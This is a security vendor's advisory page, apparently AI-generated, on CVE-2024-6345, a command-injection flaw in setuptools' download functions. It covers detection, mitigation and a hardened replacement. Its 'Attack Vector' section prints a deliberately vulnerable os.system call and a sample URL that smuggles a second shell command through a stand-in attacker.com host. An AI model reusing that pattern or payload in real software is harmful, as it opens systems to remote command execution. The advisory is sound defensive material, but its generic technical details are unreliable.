SentinelOne
CVE Vulnerability Database

CVE-2024-6345: pypa/setuptools RCE Vulnerability

CVE-2024-6345 is a remote code execution vulnerability in the package_index module of pypa/setuptools that allows attackers to inject and execute arbitrary commands via crafted package URLs. This article covers technical details, affected versions, and mitigation.

CVE-2024-6345 Overview

A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.

Critical Impact

This vulnerability allows remote code execution, potentially leading to full system compromise.

Affected Products

  • pypa/setuptools versions up to 69.1.1

Discovery Timeline

  • 2024-07-15 - CVE CVE-2024-6345 published to NVD
  • 2025-11-04 - Last updated in NVD database

Technical Details for CVE-2024-6345

Vulnerability Analysis

The vulnerability arises from insecure handling of URLs in the package_index module. This module fails to properly sanitize inputs, allowing malicious actors to inject arbitrary code via manipulated package URLs. The code execution occurs due to insufficient checks around what is executed during the download process.

Root Cause

Lack of input validation and sanitization when processing URLs leads to code injection.

Attack Vector

This vulnerability can be exploited over a network, where an attacker provides a specially crafted package URL, which then leads to code execution on the vulnerable system.

```python
# Example exploitation code (sanitized)
import os

def download_package(url):
    # The URL is interpolated straight into a shell command string, so any
    # shell metacharacter it carries (';', '&&', '|', '$(...)') is interpreted
    # by the shell rather than treated as part of the URL.
    os.system(f"curl {url} -o package.zip")

# Malicious URL: everything after ';' runs as a separate shell command
malicious_url = "http://attacker.com/malicious?;evil_command"
download_package(malicious_url)
```

Detection Methods for CVE-2024-6345

Indicators of Compromise

  • Unexpected network requests to untrusted sources
  • Unusual process executions in conjunction with package installations
  • Anomalies in package download paths

Detection Strategies

Utilize Endpoint Detection and Response (EDR) systems to monitor for suspicious behaviors such as curl being used to download executables or scripts. SentinelOne products can leverage behavioral AI to detect such anomalies.

Monitoring Recommendations

  • Monitor network traffic for unexpected destinations.
  • Audit system calls related to downloading and executing files.
  • Maintain logs of executed commands during package installations.

How to Mitigate CVE-2024-6345

Immediate Actions Required

  • Update to setuptools version 70.0 or later.
  • Restrict execution permissions for non-trusted users.
  • Implement strict input sanitization on all user-provided data.

Patch Information

Upgrade setuptools to version 70.0, where the vulnerability is patched. This removes the deprecated code paths susceptible to injection.
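The shell-interpolation pattern from the Attack Vector section beside a hardened replacement, plus a version gate for the 70.0 fix. This is an added example, not code from SentinelOne or from setuptools; it assumes that every release before 70.0 carries the unfixed download path, and `shell_tokens` only tokenizes the command string, it never runs it.

```python
import re
import shlex
import subprocess
from urllib.parse import urlsplit

FIXED_IN = (70, 0, 0)  # first release without the shell-interpolated download path


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '69.1.1' into (69, 1, 1); a suffix such as 'rc1' is dropped, missing parts are 0."""
    parts = []
    for piece in text.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """Assumption from the advisory text: anything older than 70.0 is affected."""
    return parse_version(version) < FIXED_IN


def shell_tokens(url: str) -> list[str]:
    """Tokenize the vulnerable f-string the way a POSIX shell would, without executing it."""
    lex = shlex.shlex(f"curl {url} -o package.zip", posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)  # a ';' in the URL surfaces as its own token: a second command


def build_argv(url: str, dest: str = "package.zip") -> list[str]:
    """Hardened form: validate the URL, then pass it as ONE argv element with no shell."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"refusing non-http(s) download URL: {url!r}")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        raise ValueError("whitespace or control characters in URL")
    # '--' ends option parsing, so a URL beginning with '-' cannot become a curl flag.
    return ["curl", "--fail", "--location", "--output", dest, "--", url]


def download_package(url: str, dest: str = "package.zip") -> None:
    """List-form argv: metacharacters in the URL reach curl as data, never a shell."""
    subprocess.run(build_argv(url, dest), check=True)


if __name__ == "__main__":
    from importlib.metadata import version  # check the interpreter's own setuptools
    print("installed setuptools vulnerable:", is_vulnerable(version("setuptools")))
```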

Workarounds

Isolate vulnerable systems from sensitive environments and apply network restrictions to minimize exposure.

```bash
# Configuration example (both commands require root)
# Pin the hostile host name to loopback so it no longer resolves externally
echo "127.0.0.1 attacker.com" >> /etc/hosts
# Remove the execute bit from the curl binary at this path
chmod -x /usr/local/bin/curl
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
